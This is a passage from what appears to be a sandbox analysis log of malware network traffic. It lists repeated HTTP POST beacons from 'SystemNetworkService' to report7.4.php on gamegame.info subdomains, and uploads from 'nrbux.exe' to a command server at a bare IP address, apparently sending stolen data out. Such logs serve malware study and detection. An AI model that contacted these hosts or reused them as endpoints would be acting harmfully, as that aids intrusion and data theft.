                                                                                                                                                                                        ol.gamegame.info
                                                                                                                                                                                        IN A
                                                                                                                                                                                        104.21.21.221
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://ol.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        172.67.200.215:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: ol.gamegame.info
                                                                                                                                                                                        Content-Length: 278
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:20:32 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b043f5000018796a8ed000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=IHfj2hlUwbyFgzbySqGfhrj887ipVce80YCTR%2FYejvZb1B4YECiQF0MBNJp1DmX%2F2cTxCvYGplIIYXLLvmnJl85c44bb6%2FIh6JEM0ipKJIRuM7MPBor5fFaciQAIEg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 66861cb329921879-EWR
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 278
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:20:33 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b046ff00007ceeba298000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=gtHafr7yuir87jCc5y3IT3Zt%2FEz0XcUJSWrKyMeQrygq3TlVeAfMfK%2Fi%2FBa3XsGFG8NYDMPyZqCZbVE7gnIaxfE8SMNWEsQzlzpwtCYMlP74IgjZAdgykg%2F0KUCfSg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 66861cb7dcc87cee-MUC
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 278
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:20:43 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b06fd900007cd6f31e1000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=g8Q2MHd6QQ35hIrF1Te6r9BLE4VLcc5tH%2BDzc40TfAO7CfWZtJFKxGHLWH%2FmbPRwL5PJf%2Bfpla7hbEuqjdTCmDHPAMDUZGxtP8GuEtSMZc5%2F3R%2F4MpzMNTABuNhLaQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 66861cf95d507cd6-MUC
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 278
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:20:54 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b098d100007ceebba71000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=TkA%2BpG%2B%2BIPA0wJt9YKpZ3rAbdWOhf116Tlc9y0NYrLOFuRNBYYF5xf8gTVbRV%2FVlGCqPygJMRox3GhsrK6EI6eQ156dBXWuxoXIzGY9DxJc2xFtP%2BmDJHEOFMHl9xA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 66861d3aeb287cee-MUC
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 278
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:21:04 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b0c2080000f15e1cba0000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=A3wUlcTa%2FPINV6qtudD%2BEkFoc3HeU1ZhadtZ9Jw83lfC6F8gSpWaQWhIO4MUDNA%2FGdDkXbmvTynh6GeKz6duwUYsatRUXZeHLCehHJgoTmckbzuHaf1t%2Fv4OoQQ0rA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 66861d7cde6bf15e-ARN
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 278
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:21:15 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b0ea0200001e5d6b9cc000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=sl4Ct5VegbSaQ2RLaX8aNhAzAo9NWOuPdoEAxGtaw2dccerKFu72Bh%2Bt3byRasNuKLWIZPISZ9LbBH0pm6K9mSLCx%2FqXL0QnAqCUIm8awpe%2BArKMXkdIiUNXXTVPag%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 66861dbcbaa91e5d-MUC
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 278
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:21:25 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b112d400001e65ff121000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=S33U6XQeLKtBz2CVdpvA9aL5Nkkfadtts8Mn1A0TS9DKzLAc49DbfmPXooBZm%2FNawiP8B3UEXf2PQ17dCDi%2Bbzel0cA%2Fwi2RqLSs0YBgx0m%2FM57iTTXtmYIaiI96Nw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 66861dfe18241e65-MUC
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 278
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:21:35 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b13b3b0000d91d593ea000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=OruBvLe%2FkwNEPka2b0df1E6dSqW49kgEvpWYNb%2FatOfdBOtn1kZtjTAAl%2F7FBW4vmGI2vhA3hI88j%2ByfIKUENBd5txwxx02TmfvgioTYh18NfkAe190FAyv%2FQb6l6A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 66861e3ece0cd91d-AMS
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        185.215.113.55:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /t5BnOoke2/index.php HTTP/1.1
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        Host: 185.215.113.55
                                                                                                                                                                                        Content-Length: 84
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:21:41 GMT
                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                        Content-Length: 6
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php?scr=1
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        185.215.113.55:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /t5BnOoke2/index.php?scr=1 HTTP/1.1
                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----ec01b39d03ce886c2c15019bf5bdd886
                                                                                                                                                                                        Host: 185.215.113.55
                                                                                                                                                                                        Content-Length: 89453
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 278
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:21:46 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b1633900001e659e397000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=1%2FHoWxYWiAHiEjQIwnLwGCYU68D3L%2BeIwZEFDg1UVZilmAVGi1Ay56HrkPrHcGdOVAUgvSthAsslkHnrbqlwAwjmPkvReDoSEJvnf%2F3%2B5P6zKNiyOEyudIC8VodM4Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 66861e7ec9c11e65-MUC
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 278
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:21:56 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b18b0400001e61be8e4000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=IWx2iX5XkqfQNg2Xk2xMBHfmCVIikhY3Ub1bNiZQ2LDoiQtT9R0GUoNUIlYJNmPyFpXQN8bf2BSwEuH2cqqOhuMEvjVihZ64mOwAgOz6hpC%2BzAwU8s12nBBT7EvaZg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 66861ebe6f871e61-MUC
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 278
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:22:06 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b1b2e500007ceead1bb000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=sXtI%2FyIVAugYiDa49IP53aCM4x7apBY%2BlHMsOMQkxWbmNcxIepEmXNvbpdQwU2Q%2BdseMpkZing80fyZv28YdkJeaSX6nef5rxqvzlwoJCVyYbY%2B9fgSxW3dHAxiAIg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
